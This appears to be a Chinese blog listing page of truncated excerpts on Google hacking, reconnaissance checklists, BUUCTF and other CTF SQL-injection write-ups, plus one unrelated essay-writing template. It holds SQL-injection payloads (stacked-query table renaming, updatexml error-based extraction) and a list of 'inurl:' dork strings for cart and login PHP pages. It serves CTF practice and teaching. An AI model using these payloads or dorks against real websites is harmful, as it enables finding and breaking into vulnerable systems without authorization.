【信息收集】Google hack语法基础
搜索引擎 && Google hack语法信息搜集的作用为什么要进行信息收集
获得信息
了解对方
掌握情况
寻找弱点
安全短板
信息搜集的内容
针对目标系统所相关的信息
传统搜索引擎
传统搜索引擎有效的抓取对方网站页面内容
公司动态
组织文档
用户名/密码
测试文件
历史
...
【信息收集】基础模板
信息收集整理目标事件
历史漏洞
使用手册
手机APP
小程序
域名
子域名
证书
脚本语言
php
jsp
asp
aspx
数据库
mysql
mssql
oracle
目录爬行
目录遍历
目录文件
目录浏览
君子协议 robots.txt
目录地址 - 登陆
...
议论文的基本万能模板
“名言类”议论文的基本框架
开头段:①引出主题 +②表明立场
主题段:论证主题
结尾段:①重申立场 + ②建议
1题目:'You can cite examples to illustrate the importance of paying attention to others' opini
...
[buuctf]web SQL注入篇
简单说明1记录buuctf web中SQL注入学习 简单题目未写
[强网杯 2019]随便注1、万能密码注入
123451';rename table words to words2; rename table `1919810931114514` to
...
谷歌语法搜索关键字(打包)
语法格式例如:inurl: about.php?cartID=
about.php?cartID=
accinfo.php?cartId=
acclogin.php?cartID=
add.php?bookid=
add_cart.php?num=
addcart.php?
...
第十四届全国大学生CTF比赛
easy_sql
1、通过报错注入获取flag的字段名id
11') or updatexml(0x2e,concat(0x2e,(select * from(select * from flag as a join flag b)c)),0x2e)#
2、通过的方式获取flag
...